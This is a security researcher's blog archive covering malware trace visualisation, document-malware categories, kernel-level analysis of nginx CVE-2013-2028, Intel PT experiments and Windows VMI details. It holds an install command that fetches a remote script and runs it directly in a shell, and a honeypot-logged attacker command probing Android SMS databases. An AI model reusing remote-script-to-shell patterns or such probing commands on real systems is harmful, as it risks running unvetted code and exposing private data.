Looks like there's a streak of incorrect predictions that lines up with the dark blue, but let's confirm it by subtracting the two images. This will cause areas of accurate prediction (white in the second image) to become black while areas of incorrect predictions will keep their color from the first image. Here's the result:

Sure enough, that blue streak is an anomaly produced by pdfka. In fact, if we were to visualize all the pdfka samples in our paper's evaluation dataset, we would find they all contain a blue streak. What the blue is really visualizing is an exploit (CVE-2010-0188) being carried out against the TIFF parser library in AcroRd32.dll. Therefore, we can say the color of pdfka is dark blue!

Other Examples

To demonstrate the value of subtracting, consider this visualization of opening a Microsoft Word document:

You may be tempted to conclude this is a red malware (since coming up with this technique, I've been referring to malware by their colors instead of family names for fun), but it's actually benign. We can see this in the subtraction:

No colors means no anomalies. Now let's see a trace of hancitor:

As you can see, it's green malware. Meanwhile thus is blue-purple:

I think that's enough examples to make my point. I hope you've been convinced that malware has a color. Thanks for reading and happy hacking!

Upcoming MLsploit Demo at Black Hat Asia 2019

2019-01-17T17:00:00-05:00

A framework I helped develop called MLsploit will be demoed at Black Hat Asia 2019. You can read more about it here.

Three Kinds of Document Malware and Designing Frameworks to Detect Them

2018-12-27T12:00:00-05:00

Lately I've been spending a lot of time with document malware and exploring techniques for detection. Malicious documents pose interesting challenges and have become the typical first vector for adversaries to achieve a foothold. Despite this, document malware seems largely overlooked by academics compared to their executable counterparts. In short, it's an area worth exploring.

As I compared the current detection techniques, I noticed the pros and cons are nuanced. Static analysis is quick and accurate, but very vulnerable to evasion via adversarial perturbation. Dynamic analysis is slower and error prone because samples can fail to trigger, but produce richer data. These characteristics are further amplified by the use of machine learning. Adding junk bytes between the elements of a PDF can evade a static feature learner in seconds. Unfortunately, dynamic features don't fare much better.

In time I've begun to formulate a theory that there are currently three kinds of document malware. By applying this insight, I find I can substantially influence the results of my experiments. While not as conclusive as something like a double disassociation, I want to share what I've observed in hopes that it'll inspire others when designing their detection systems and provoke feedback.

So without further ado, here's my theory. Currently, there are three kinds of document malware: exploit-based, abuse-based, and phishing-based. While I propose categories, note that they are not mutually exclusive. Malware authors can always chain and blend techniques to achieve their goals. Therefore, these categories should be seen as points on a spectrum. That said, complexity invites failure, so I do not expect real world authors to stray far from these focal points. The following paragraphs elaborate on each category in reverse order.

Phishing-based

This is the trickiest category for a computer scientist because humans are complicated and confusing entities. The exemplar of this category is a document that tries to convince the user to take some compromising action. There may be a link to a fake website or steps that lead to disabling a security feature. Admittedly, this is a category I currently steer clear of. The best solutions are better education, stronger polices, and a clear strategy for recovery when a human mistake in inevitably made. Also note that this category is the most likely to be chained with others. For example, a document may need to lure the victim into clicking a button before a payload can be used. In rare cases, user interaction may even be leveraged to thwart automated analysis. Thankfully, I have yet to see a malware author embed a CAPTCHA in their document.

Abuse-based

This category does not consider the human user, but distinguishes itself in how it uses the target application. The exemplar here is a PDF containing JavaScript or a Word document with macros that uses provided APIs to download and execute additional malware. The key point to emphasize here is these documents do not violate the specification of the application. The program is functioning as intended. This is why I label these instances as abuse rather than exploitation. This distinction is critical to consider when designing a detection framework. On the one hand, they're tricky because they blend in with benign behavior. This is why, for example, looking at system call sequences is a bad idea for this category. On the other hand, since the program's integrity isn't compromised, it's safe to make strong assumptions in these situations. This is where static analysis is best suited. Designed correctly, such frameworks can leverage strong models of the target program to accurately and statically detect abuse. This saves resources and minimizes exposure to noise.

Exploit-based

Which brings us to the last category. Here's were we see the stuff 0-days and CVEs are made from. It's also where all corners of the security community like to flaunt their technical knowhow with intricate ROP chains and compact shellcode. Jargon aside, this category differs from abuse-based in that it does violate the program's specification. Memory corruption, underflows, overflows, and more are all fair game for achieving arbitrary code execution. This means the author's attacks can take unusual forms, like malformed images, and detection frameworks have to cope. For this reason, this is where dynamic analysis overtakes static. Because exploits by definition break models and assumptions, the only way towards proactive detection is to actually trigger them.

I hope readers find this categorization useful. Note that this is not the only way document malware can be divided. For example, payloads can execute inside the target application or in a separate process, creating a spectrum of intrinsic verses extrinsic behaviors. Regardless, my three category theory has helped me design novel systems and interpret the evaluation results, so I wanted to share it.

Thanks for reading.

Mention for Georgia Tech Vulnerability Disclosure

2018-09-05T22:15:00-04:00

Georgia Tech has acknowledged me for a past vulnerability I disclosed to them.

The Unfortunate Economics of Defense in Depth

2018-08-14T23:30:00-04:00

A mantra we hear all the time in security is the notion of defense in depth. It's applied in numerous areas from protecting computer systems to safeguarding airports. Anyone who receives formal training in security will likely encounter the term at least once in their coursework. It's a milestone we are told to strive for when designing secure systems.

For readers who are unfamiliar with the term, it's the idea that when designing security into a system, we should place several overlapping layers of defense wherever possible. The insight behind this idea is that thwarting an attack only requires one layer of defense to succeed whereas the attacker's success depends on penetrating every layer. Consider, for example, an invading army storming a castle. In order for the invasion to succeed, the invaders must survive raining arrows from archers, traverse a moat, breach the castle walls, and kill the soldiers inside. Failure to surmount any one of these defenses spells disaster for the attack. Worse yet for the invading army, as long as each layer's chance of successfully halting the attack is independent from the other layers, adding more layers makes the attacker's task more likely to fail. On the other hand, this is great news if you are the one assigned to defend the castle.

Unfortunately, step outside the classroom and it will not take long to run into the counterforce that stifles an otherwise brilliant concept. The force I am referring to is economics. Defenses don't come for free and as I plan to highlight in this blog post, there is a fundamental problem with applying defense in depth once economics enters the equation.

To aid my explanation, let's use fair coin flips as a simple running example. Although coins are a far cry from airports or castles, the underlying probabilities behind flipping a coin are simple to understand and also sufficient to make my point.

As you are probably already aware, a fair coin flip yields one of two possible outcomes, heads or tails, with equal and mutually exclusive probabilities. The probability of getting heads once is 50%. Getting heads twice in a row is 25%. Three times is 12.5%. This probability p is expressed by the following formula for x coin flips:

If we graph this function for a couple of flips, we get the following figure:

As we can see, the relationship between the number of flips and the probability is exponential. Adding a few additional flips significantly impacts the probability of getting all heads at first, but as even more flips are added, eventually the effect diminishes. In other words, the difference in chance of getting two heads verses three is substantial, but the difference between 999 and 1,000 heads is comparatively minuscule. Tying this analogy back to security, if we map the outcome of heads to the attacker successfully breaching a layer of security, we can see how overlapping a few defensive layers can offer significantly better security and reduce the attacker's chance of success. However, with each additional layer, the defender's gain diminishes. Regardless, this outcome shows that defense in depth is fundamentally valuable and we can safely apply it in the real world as long as the effectiveness of the layers being evaluated are completely (or at least nearly) independent to each other.

Unfortunately, as I alluded to in the introduction, every layer of defense has a cost to design, implement, deploy, and maintain. If these costs are also completely (or at least nearly) independent, a problem arises. Namely, each additional layer raises the cost of the overall defense linearly, but the return yielded in security diminishes exponentially. Returning to our running example, now consider the case where each flip costs one unit of resource to perform. If we add this function to our previous graph, we get the following figure:

And if we reformat this graph to show the proportional gain in cost to the gain in security, we get:

Put plainly, the cost of using defense in depth to achieve decent security is relatively cheap, but achieving exceptional security is extremely expensive. This is bad news for the defender and a fundamental limitation to the idea of defense in depth.

Hopefully you now understand the title of this blog post and realize why this relationship is important to grasp. For example, understanding this topic helps explain the controversies and debates surrounding the cost of funding the Transportation Security Administration's twenty "Layers of Security" framework:

I'll forgo an in-depth analysis of this chart since other researchers have already examined it in great detail, but to summarize, if you pick a relevant threat to airport security and consider each layer's effect on stopping it, you'll realize removing any one layer has seemingly little impact on the overall risk of failure. This begs the question of whether there are layers that can be removed to significantly reduce cost without significantly reducing security. Certainly an idea worth exploring, if the science can be separated from the politics. Until then, I hope you've found this blog post interesting and insightful.

Paper Accepted to ACM CCS 2018

2018-07-23T22:00:00-04:00

A paper I co-authored has been accepted to the 25th ACM Conference on Computer and Communications Security (CCS'18) being held in Toronto, Canada from October 15, 2018 to October 19, 2018.

Title: Enforcing Unique Code Target Property for Control-Flow Integrity

Authors: Hong Hu, Chenxiong Qian, Carter Yagemann, Simon Pak Ho Chung, Bill Harris, Taesoo Kim, Wenke Lee

Abstract:

The goal of control-flow integrity (CFI) is to stop control-hijacking attacks by ensuring that each indirect control-flow transfer (ICT) jumps to its legitimate target. However, existing implementations of CFI have fallen short of this goal because their approaches are inaccurate and as a result, the set of allowable targets for an ICT instruction is too large, making illegal jumps possible.

In this paper, we propose the Unique Code Target (UCT) property for CFI. Namely, for each invocation of an ICT instruction, there should be one and only one valid target. We develop a prototype called uCFI to enforce this new property. During compilation, uCFI identifies the sensitive instructions that influence ICT and instruments the program to record necessary execution context. At runtime, uCFI monitors the program execution in a different process, and performs points-to analysis by interpreting sensitive instructions using the recorded execution context in a memory safe manner. It checks runtime ICT targets against the analysis results to detect CFI violations. We apply uCFI to SPEC benchmarks and 2 servers (nginx and vsftpd) to evaluate its efficacy of enforcing UCT and its overhead. We also test uCFI against control-hijacking attacks, including 5 real-world exploits, 1 proof of concept COOP attack, and 2 synthesized attacks that bypass existing defenses. The results show that uCFI strictly enforces the UCT property for protected programs, successfully detects all attacks, and introduces less than 10% performance overhead.

Weird Things Are Afoot In The Honeypot

2018-05-30T11:00:00-04:00

Here's something you don't see every day. The logs from my SSH honeypot show someone brute-forcing the password for root and then executing:

ls /data/data/com.android.providers.telephony/databases

This is a strange directory to look for because it's where Android devices store the SQLite databases for SMS messages and contacts. Why would an attacker except an SSH server on the internet to be an Android device? Are there IoT devices based on Android that run SSH servers and also store contacts? If someone knows, please tell me!

EFF and EFAIL: An Example of Hype Culture Gone Awry

2018-05-14T21:30:00-04:00

I usually try to keep my blog posts technical and free of politics, but I can't hide my frustration over EFF's response to today's release of the EFAIL vulnerability.

If you haven't heard by now, EFAIL is the name of a vulnerability having to do with how email clients like Thunderbird handle PGP encrypted emails. This vulnerability allows a strong adversary to decrypt emails given that they have previously encrypted messages from a victim, can tamper with emails in-transit, and assuming the victim's client is configured to automatically fetch remote content.

I emphasize the word strong because any security researcher can see that these preconditions mean this attack is only a concern to individuals being targeted by nation-states. As many Slashdot users and companies like ProtonMail have pointed out, this vulnerability is over-hyped, blown out of proportion, and the course of action being loudly proposed is somewhere between draconian and moronic.

Unfortunately, it seems EFF is at the forefront of this crusade to misguide users. Within hours of the details being released, EFF published a blog post advising everyone to immediately stop using PGP. Since then, less than 24 hours later, EFF has published over 13 articles driving home the "crisis" and providing step-by-step tutorials on how to "take action" by disabling PGP and decrypting emails. It is impressive that EFF has managed to write so much about EFAIL in so little time.

As a security researcher, allow me to share a piece of wisdom echoed by many of my peers. The appropriate reaction to a vulnerability that can potentially decrypt emails is not to start sending messages in plaintext. Sane people don't erase their operating system because of a bug, disable their firewall because of a glitch, or stop using encryption because of a flawed implementation. Decide how big of a risk EFAIL is to you, come up with a plan for remediation based on that risk, and apply software patches when they become available. For most users, this boils down to simply continuing your good security habits. Disabling security in response to a bug is insanity.

Shame on EFF for over-hyping vulnerabilities and giving terrible security advice!

Debian Apt Repo for libipt

2018-02-24T18:30:00-05:00

As part of my Ph.D. research, I play around with Intel Processor Trace a lot. As a result, I frequently use libipt; both as a library for my own software and for the reference programs it includes. ptdump and ptxed are my goto utilities for quickly checking and manipulating traces. They're super useful!

Sadly on Debian and Ubuntu, the default package repositories only have a package for the main library (no pre-compiled program binaries) that is woefully out of date (last update was in 2016). Having to repeatably compile xed and libipt from source quickly got annoying, so I've decided to publish my own repository. I've also made it public in hopes that others will find it useful.

The repository tracks the master branch on libipt and xed, so its packages should always contain the latest code. I've made adding it to apt super easy:

sh -c "$(wget -qO - https://super.gtisc.gatech.edu/libipt.sh)"

It currently has the following libraries:

libxed
libxed-dev
libipt (includes the sideband library)

And the following pre-compiled programs:

ptdump
pttc
ptxed

More information about these libraries and programs is available in their respective documentation. I hope to add more packages in the coming days.

For people interested in learning how to host their own repositories, I built this server using gocd, aptly, and apache.

H&R Block "MyBlock" App + USA Government Website Analytics = PROFIT

2018-02-09T16:00:00-05:00

I like data mining. For better or worse, it's the gold of the digital age. So when the USA government decided to make the analytical data for their publicly facing websites available for download, I jumped at the opportunity. Thanks to this lovely data source, I can get insights into how popular various browsers and operating systems are, how frequently devices connect to USA government websites from foreign IP address, and more.

Sadly, the website only offers metrics for the past 30 days. Luckily, it's pretty easy to setup a raspberry pi or other small device to periodically fetch the freshest numbers and build a larger dataset. This is what I've been doing since August of 2016. If you're interested, send me an email and I'll be happy to share. After all, according to the government's website: "this website and its data are free for you to use without restriction."

Continuing my story, I was skimming over the most recent metrics when I noticed a funny browser user-agent:

HRB-MOBILE-IOS-PHONE-MYBLOCK-TOUCHID-6.1.0-Mozilla

With a quick search, I figured out that MyBlock is a mobile app offered by H&R Block. More interesting though is the juicy information H&R Block decided to embed in these user-agent strings. As we can see, they contain the name of the app, the version number, the OS (iOS or Android), the device form factor (phone or tablet), and in the case of iOS, it even mentions if TouchID or FaceID was used. As a security researcher, I'm particularly interested in this last tidbit because people use H&R Block to file taxes and these user-agents started appearing January 7, 2018 (i.e., tax season). So how many people use the various authentication methods offered by Apple to protect their tax filing app? Let's find out!

The following is a small Python script I wrote to filter the data. The parsing and filtering leaves much to be desired, but I didn't want to spend too much time on such a simple task:

#!/usr/bin/env python
import sys
import json

def parse_subtokens(tokens):
    """ Parses subtokens and returns a dictionary. If invalid, None is returned.

    We expect Android user agents to be in the form of:
        HBR MOBILE ANDROID [PHONE|TABLET] MYBLOCK [VERSION] <BROWSER>
    and iOS user agents to be in the form of:
        HBR MOBILE IOS [PHONE|TABLET] MYBLOCK <TOUCHID|FACEID> [VERSION] [BROWSER]
    """
    res = {}

    if tokens[0] != 'HRB':
        return None

    if tokens[1] != 'MOBILE':
        return None

    if tokens[2] != 'ANDROID' and tokens[2] != 'IOS':
        return None
    res['OS'] = tokens[2]

    if tokens[3] != 'PHONE' and tokens[3] != 'TABLET':
        return None
    res['DEVICE'] = tokens[3]

    if tokens[4] != 'MYBLOCK':
        return None
    res['APP'] = tokens[4]

    if tokens[2] == 'ANDROID':
        if len(tokens[5:]) == 1:
            res['BROWSER'] = 'N/A'
            res['VERSION'] = tokens[-1]
            res['AUTH'] = 'N/A'
        elif len(tokens[5:]) == 2:
            res['BROWSER'] = tokens[-1]
            res['VERSION'] = tokens[-2]
            res['AUTH'] = 'N/A'
        else:
            return None

    if tokens[2] == 'IOS':
        if len(tokens[5:]) == 2:
            res['BROWSER'] = tokens[-1]
            res['VERSION'] = tokens[-2]
            res['AUTH'] = 'N/A'
        elif len(tokens[5:]) == 3:
            res['BROWSER'] = tokens[-1]
            res['VERSION'] = tokens[-2]
            res['AUTH'] = tokens[-3]
        else:
            return None

    # Cleanups:
    #     1) Some versions of the Android app prefix 'v' onto version

    if res['VERSION'][0] == 'v':
        res['VERSION'] = res['VERSION'][1:]

    assert len(res) == 6
    return res

def is_hrb(year, filter, line):
    """ Validate that a line should be parsed and added to the buckets.

    Specifically, entry should contain the right year, be a HRB user-agent,
    and contain the filter keyword if one was provided.
    """
    if line[:4] != year:
        return False
    if line[11:14] != 'HRB':
        return False
    if not filter is None and not filter in line:
        return False
    return True

if __name__ == '__main__':

    if len(sys.argv) < 3:
        print 'Usage:', sys.argv[0], '<tax-year>', '<filter>', '<filepath>'
        sys.exit(0)

    if len(sys.argv) == 3:
        filter = None
    else:
        filter = sys.argv[2]

    with open(sys.argv[-1], 'r') as ifile:
        data = [line.strip() for line in ifile if is_hrb(sys.argv[1], filter, line)]

    buckets = {
        'OS': {
            'IOS':     0,
            'ANDROID': 0,
        },
        'DEVICE': {
            'PHONE':   0,
            'TABLET':  0,
        },
        'APP': {
            'MYBLOCK': 0,
        },
        'AUTH': {
            'TOUCHID': 0,
            'FACEID':  0,
            'N/A':     0,
        },
        'VERSION': {},
        'BROWSER': {},
    }

    for line in data:
        tokens = line.split(',')
        if len(tokens) != 3:
            print 'WARNING: Cannot tokenize:', line
            continue

        subtokens = parse_subtokens(tokens[1].split('-'))
        if subtokens is None:
            print 'WARNING: Cannot subtokenize:', tokens[1].split('-')
            continue

        try:
            count = int(tokens[-1])
        except ValueError:
            print 'WARNING: Could not parse count from:', line
            continue

        buckets['OS'][subtokens['OS']]         += count
        buckets['DEVICE'][subtokens['DEVICE']] += count
        buckets['APP'][subtokens['APP']]       += count
        buckets['AUTH'][subtokens['AUTH']]     += count

        if subtokens['VERSION'] in buckets['VERSION']:
            buckets['VERSION'][subtokens['VERSION']] += count
        else:
            buckets['VERSION'][subtokens['VERSION']] = count

        if subtokens['BROWSER'] in buckets['BROWSER']:
            buckets['BROWSER'][subtokens['BROWSER']] += count
        else:
            buckets['BROWSER'][subtokens['BROWSER']] = count

    print json.dumps(buckets, indent=4)

Results

So here's what I uncovered, listed in no particular order:

From January 7 through February 8, 232,248 requests were made by MyBlock apps.
230,226 requests were made from phones while 2,022 were tablets; over 99% of the requests were phones.
0 requests were made by Android tablets.
Over 99% of requests were made by devices running iOS.
Two versions of the app appear in the dataset: 6.0.0 and 6.1.0.
Version 6.1.0 makes up over 99% of the requests.
The first requests made by version 6.1.0 occurred on January 13; 6 days after the first 6.0.0 request.
100% of requests from Android devices were version 6.1.0.
The requests made from Android devices contain no information about authentication method or browser.
100% of requests from iOS contain "Mozilla" in the user-agent.

And finally, the observations relevant to my question:

170,816 requests used TouchID, 15,323 FaceID, and 45,867 showed neither keyword; 74%, 7%, and 19%, respectively.
0% of requests for version 6.0.0 on iOS used FaceID.

Discussion

For the requests from iOS devices that didn't mention an authentication method in their user-agent, I assume the user typed in a password or pin, though I haven't confirmed this. I also haven't looked into why all the iOS requests have "Mozilla" at the end of their user-agent. It's probably related to the browser framework used by the MyBlock app.

Judging by the fact that no requests from version 6.0.0 of the app used FaceID, it's possible that this feature wasn't implemented until 6.1.0, though this is just speculation.

Most interestingly, users appear to be comfortable with using Apple's TouchID to protect their MyBlock. Even more interesting is that people are comfortable with using FaceID, considering that this feature is relatively new. It appears that in mobile computing, biometric authentication is a widely accepted trend.

It's also worth mentioning that while MyBlock doesn't appear to have been available during the 2017 tax season, another H&R Block app does appear:

HRB-MOBILE-IOS-PHONE-TAXES-6.4-Mozilla

This app seems to have two version: 6.4 and 6.3, but the total number of requests is very low; only a few thousand. Another interesting finding is 13 requests made on April 26, 2017 with this user-agent:

HRB-MOBILE-IOS-PHONE-TAXES-nil-Mozilla

Perhaps this was a test version of the app?

Future Work

We still have 2 months to go in this year's tax season, so I'll be interested to check the numbers once the season closes. I'm also interested to see how many people continue to use this app outside of the tax season and how these results will change in 2019.

How ASLR Helps Enable Exploits (CVE-2013-2028)

2017-12-16T11:30:00-05:00

The other day I was playing around with CVE-2013-2028 along with my peer Hong Hu when we came across something odd: CVE-2013-2028 is only exploitable on 64-bit GNU/Linux when ASLR is enabled. After confirming this observation multiple times, we were left very surprised. How could ASLR possibly worsen the security of an application? Driven by curiosity, we decided to find the root cause of this result. Ultimately, we had to go all the way to the Linux kernel code to find our answer. What we found was a kernel quirk that can't really be called a bug from the kernel's perspective, but does go against the expectations of the user. So without further ado, allow me to share how ASLR can enable the exploitation of applications.

For those unfamiliar with CVE-2013-2028, all that needs to be known is it's an exploitable vulnerability in older versions of nginx stemming from a stack buffer overflow that can be triggered by specially crafted HTTP requests. The bug occurs because an integer provided to nginx by the user that is intended to be an unsigned value is accidentally casted temporarily into a signed value. If an attacker passes a sufficiently large value, the worker thread handling the request will copy too much data from its network socket into a fixed sized buffer causing the stack to get smashed. For the curious reader, a more in-depth analysis is available here and a repository for reproducing it is available here.

So why is this bug only exploitable when ASLR is turned on? We can find the user space answer with a simple strace. If we make a chunked HTTP request and claim the total size is going to be 0xaaaaaaaaaaaaaaaa, nginx's worker will make a recvfrom() system call for 0xaaaaaaaaaaaaaab0 bytes from the network socket. When ASLR is turned on, the Linux kernel will copy our request (which is not actually 0xaaaaaaaaaaaaaaaa bytes long) into the worker's buffer, smashing the stack. However, when ASLR is turned off, the kernel will return -EFAULT and the worker will safely report the error and close the session.

We could stop here, but Hong and I were not satisfied. Why is the kernel returning -EFAULT when ASLR is disabled but not when it is enabled? The space allocated for the stack is the same in both cases, so that can't be the problem. The only obvious difference is ASLR moves the stack's address range to randomize it. When ASLR is disabled, the stack's highest address is placed at the boundary between user and kernel space, which is 0x7fffffffffff in Linux kernels compiled for x86_64. However, 0xaaaaaaaaaaaaaab0 is such a large number it shouldn't matter where the stack is placed. It's not going to fit into the memory segment and it's going to cross the boundary. So what's really happening in the kernel when it handles a recvfrom() system call?

Taking a look at Linux's implementation of recvfrom(), we see the following code:

SYSCALL_DEFINE6(recvfrom, int, fd, void __user *, ubuf, size_t, size,
                unsigned int, flags, struct sockaddr __user *, addr,
                int __user *, addr_len)
{
    struct socket *sock;
    struct iovec iov;
    struct msghdr msg;
    struct sockaddr_storage address;
    int err, err2;
    int fput_needed;

    err = import_single_range(READ, ubuf, size, &iov, &msg.msg_iter);
    if (unlikely(err))
        return err;
    sock = sockfd_lookup_light(fd, &err, &fput_needed);
    if (!sock)
        goto out;

    msg.msg_control = NULL;
    msg.msg_controllen = 0;
    /* Save some cycles and don't copy the address if not needed */
    msg.msg_name = addr ? (struct sockaddr *)&address : NULL;
    /* We assume all kernel code knows the size of sockaddr_storage */
    msg.msg_namelen = 0;
    msg.msg_iocb = NULL;
    if (sock->file->f_flags & O_NONBLOCK)
        flags |= MSG_DONTWAIT;
    err = sock_recvmsg(sock, &msg, flags);

    if (err >= 0 && addr != NULL) {
        err2 = move_addr_to_user(&address,
                                 msg.msg_namelen, addr, addr_len);
        if (err2 < 0)
            err = err2;
    }

    fput_light(sock->file, fput_needed);
out:
    return err;
}

This code performs two relevant checks. The first occurs in:

err = import_single_range(READ, ubuf, size, &iov, &msg.msg_iter);

And the second occurs in:

err2 = move_addr_to_user(&address, msg.msg_namelen, addr, addr_len);

However, we can rule out move_addr_to_user() because it's passed the number of bytes actually fetched from the socket, which is the same in our attack regardless of ASLR. This leaves import_single_range(), which is implemented as follows:

int import_single_range(int rw, void __user *buf, size_t len,
                        struct iovec *iov, struct iov_iter *i)
{
    if (len > MAX_RW_COUNT)
        len = MAX_RW_COUNT;
    if (unlikely(!access_ok(!rw, buf, len)))
        return -EFAULT;

    iov->iov_base = buf;
    iov->iov_len = len;
    iov_iter_init(i, rw, iov, 1, len);
    return 0;
}
EXPORT_SYMBOL(import_single_range);

In this function, a sanity check is performed via access_ok() to make sure the number of bytes requested by the caller cannot cause a write that would cross into kernel space. But as we pointed out before, the value nginx's worker is passing here is 0xaaaaaaaaaaaaaab0, which should easily cross the boundary regardless of ASLR. The type size_t is defined as an unsigned 64-bit integer in our case, so access_ok() should be passed 0xaaaaaaaaaaaaaab0, right? Actually, if we look more closely, we can see the following lines enforce a limit on len:

if (len > MAX_RW_COUNT)
    len = MAX_RW_COUNT;

If we lookup MAX_RW_COUNT, we can see it equals (INT_MAX & PAGE_MASK), which turns out to be a 32-bit value. So in other words, even though recvfrom() allows 64-bit unsigned integer lengths on x86_64, import_single_range() truncates them into 32-bit unsigned integers! On a 64-bit processor, this truncation combined with ASLR's relocation of the stack allows our attack to pass the access_ok() check and smash nginx's stack.

Technically, this isn't a bug from the kernel's perspective because import_single_range() also calls iov_iter_init() with the truncated length. This means recvfrom() can only receive up to the truncated length worth of bytes from the socket and therefore passing the truncated value to access_ok() is safe.

That said, it's a really odd way of implementing this system call. From the caller's perspective, it's not made clear that even though it can pass a 64-bit length, only the lower 32-bits will be considered. Also recvfrom() treats the length as 64-bits all the way through its logic, so it's not immediately obvious that the length is being truncated by MAX_RW_COUNT. Additionally, as Hong and I discovered, there is a security consequence to this choice. Performing the access_ok() check on the truncated length allows network attacks that rely on integer overflow and underflow to succeed where they would otherwise more likely be blocked by the kernel due to a failed system call. We find this to be an interesting consequence since it results from seemingly unrelated design decisions. It is hard to recommend that the Linux kernel developers revise import_single_range() given that the real problem is a bug in nginx and not the Linux kernel itself, but we find this discovery fascinating regardless.

Intel PT Data at Rest: A Compression Experiment

2017-10-28T10:30:00-04:00

Full Disclosure: I am a researcher in Georgia Tech's ISTC-ARSA, which is funded by Intel. Although I reference two publications that share Xinyang Ge and Weidong Cui as authors, I am neither associated with them nor Microsoft Research at the time of writing.

Intel Processor Trace (PT) is a powerful hardware feature for recording the behavior of CPUs. With it, developers and researchers can monitor the control-flow path taken by threads, hardware interrupts, and more, all with cycle-accurate timing. However, this rich stream of data comes at the cost of size. Depending on what PT is configured to trace, it can output hundreds of megabytes of data per second per core. PT does take steps to save bandwidth by only recording changes in control-flow, excluding redundant high-order bits in target addresses, and compressing returns leading to predictable locations. However, despite this compression, the volume of data is still massive.

As a consequence, much of the work published so far handles tracing in one of two ways. One option is to consume the trace as it is generated. This works as long as the consumer can keep up with the producer, which is the case in the control-flow integrity (CFI) system Griffin. The other common approach is to configure PT to write in a circular buffer. This option is suitable for crash dump analysis systems like Snorlax, which only need a fixed size window into a thread's past.

However, while some applications are feasible using the two previous methods, there are still situations were it is desirable to store the entire trace for postmortem analysis. If nothing else, it is useful for repeatable experiments. With this in mind, I performed a naive experiment last night to explore if more can be done to compress PT traces when the data is at rest. Based on the observations that the compression PT applies is highly localized (i.e. a target address verses the previously recorded target address and a return verses the previously recorded call) and that programs often execute repetitive loops, I hypothesized that even a general purpose compression algorithm should be able to compress traces with a good ratio.

Procedure

The overall idea for the experiment is very simple: gather some PT traces, compress them with a commonly used algorithm, and compare the sizes. For a subject I used the simple HTTP server that comes with Python 2.7 to host a copy of this blog. For each trial I had a crawler request pages from the server for a set duration. Once the time expired, I terminated the server and crawler and stopped the tracing. I then compressed the trace using the GNU/Linux utility gzip, which uses Lempel-Ziv coding. I also fed it through a disassembler that matches the PT packets to the binary's static code to produce a linear sequence of instructions. From this I counted the number of unique basic blocks executed during the trace to serve as a rough proxy for code coverage. To summarize the procedure:

Configure and enable PT tracing.
Start the Python HTTP server.
Start the crawler.
Wait for a specified duration.
Terminate the crawler and server.
Stop PT tracing.
Compress the resulting trace and count the number of unique basic blocks executed.

Results

Comparing the original size of the PT trace to the size after compression produces the above graph. Both plots best match linear regressions and are increasing over time. However, the size of the compressed traces increases at a slower rate than the uncompressed traces, meaning these two plots are diverging as time increases.

Another observation to note is the large volume of trace data produced during the server's startup. This explains why even the shortest trial produced a 1GB trace. For the same reason, counting the number of unique basic blocks turned out to not be useful. The number of new basic blocks executed while serving requests was small.

The next graph shows the relationship between the compressed and uncompressed sizes as a space savings percentage. The plot best fits a linear regression and shows the savings decreasing over time. This is likely due to the design of the underlying compression algorithm, which is intended for general use and does not take into consideration the unique characteristics of PT traces.

To summarize, this experiment shows that more can be done to compress PT traces for storage at rest.

Discussion

It is understandable that the compression used by PT would produce small space savings compared to general compression algorithms given the limitations of hardware memory and Intel's very strict performance overhead requirements. In practice, PT produces an overhead of less than 4% in the worst case, and less than 2% on average. These numbers are based on my own observations and the results published by other researchers. In short, PT has very few clock cycles and very little space available for performing compression.

Another factor that deserves consideration is compression's impact on processing time. For systems that consume PT traces on the fly, the largest source of performance overhead is not PT tracing itself but rather the time spent buffering and consuming it. In CFI, for example, the PT trace has to be matched with the executed code in order to reconstruct control-flow. This is why the authors of Griffin report a 11.9% overhead on the SPECint benchmark despite the 4% overhead of PT itself. Adding better space saving compression could increase this overhead further.

That said, for storing PT traces at rest, more can be done to better conserve space.

Windows _EX_FAST_REF Pointers and Virtual Machine Introspection

2017-08-29T23:00:00-04:00

Last week I was working on a VMI-based malware unpacker for Linux and Windows when I came across an interesting problem. I was trying to implement a method that would, given a virtual address and process ID, return the address range of the memory segment it belongs to using VMI.

Implementing this in Linux was no problem for me because it's the OS I'm most familiar with. The implementation boils down to getting the current process' task_struct, looking up the pointer to it's memory mapping (task_struct->mm), and then iterating through its linked list of virtual memory areas (mm->mmap) until a match is found. Pretty straight forward.

Windows seemed a little tricker but very similar. The main difference is while Linux uses a linked list of structures called virtual memory areas, Windows uses structures called virtual address descriptors (VADs) linked into a balanced binary tree. The procedure is fairly similar. Once the current executive process (_EPROCESS) is located in memory, read its VadRoot pointer that, as the name implies, points to the root of the binary tree of VADs and then check the VAD's memory range. Lookup the left child if the range is too high, the right child if the range is too low, and repeat until the desired VAD is located. A straightforward binary search.

So I implemented my VMI function, ran it, and to my surprise it failed. After some debugging, I discovered that when the code read VadRoot, the pointer would always be 3 bytes greater than the actual base virtual address of the root VAD. Here are some examples of addresses that my code read for 64-bit Windows 7, printed in little-endian:

1b 3c 90 02 80 fa ff ff
6b 3d 6a 02 80 fa ff ff
3b 69 8e 01 80 fa ff ff

Why are the 4 least significant bits always 0xb and why was I only having this problem with the VadRoot pointer and no other pointers? Stumped, I asked my question to the libVMI forum and the developer of DRAKVUF kindly pointed out the answer: the Windows kernel sometimes uses a special pointer called a _EX_FAST_REF.

If you take a look at the definition for this type, you will notice something interesting:

typedef struct _EX_FAST_REF
{
    union
    {
        PVOID Object;
        ULONG RefCnt: 3;
        ULONG Value;
    };
} EX_FAST_REF, *PEX_FAST_REF;

As you can see, the Windows kernel uses the 3 least significant bits as a reference counter. Therefore, in order to read this pointer correctly using VMI, these bits need to be masked out after reading the pointer. Once I realized such a pointer existed, the rest of the implementation was straightforward.

So there you have it. The Windows kernel sometimes uses a special pointer that stashes a reference counter in the lower bits. Something to watch out for when you're doing virtual machine introspection. Hopefully this blog post will save others some time.

You never know where your code will end up.

2017-07-28T16:30:00-04:00

I was searching through an archive site for 4Chan when I noticed that my name was in a random post on the Technology board, /g/:

Anonymous Sat Jun 17 11:13:54 2017 No.60943336

>>60943289
I'm running it locally, but you can get it here:
https://github.com/carter-yagemann/4ChanBBS
It uses the official API to retrieve posts, and it even converts images to ASCII

The link is for a public repository I created on Github. It contains a proxy server written in Python that allows computers to browse 4Chan via a telnet connection using a command line interface (CLI) reminiscent of old-school BBS sites. I wrote it in a few hours purely as a joke and then never touched it again. Everything about it was intended as nothing more than a quick laugh, down to how it crudely converts images into ASCII strings so they can be displayed in the terminal. I didn't put much effort into the project and I assumed no one would ever care.

But apparently someone did care and that someone owns a retro computer:

Seeing my code's banner page on a monitor old enough to be from the days of BBS made my day. I don't know the person that posted this image, but I'm happy to know someone found value in my forgotten code. It just goes to show that you never know where your code will end up.

Intel Processor Trace, execvp, and ptrace

